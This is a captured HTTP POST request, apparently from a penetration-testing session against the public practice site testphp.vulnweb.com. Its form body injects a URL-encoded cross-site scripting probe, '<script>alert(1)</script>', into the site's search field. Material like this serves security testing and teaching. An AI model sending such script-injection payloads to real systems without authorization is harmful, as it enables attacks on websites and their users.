POST /search.php?test=query HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Host: testphp.vulnweb.com
Origin: http://testphp.vulnweb.com
Referer: http://testphp.vulnweb.com/artists.php
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36

searchFor=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&goButton=go
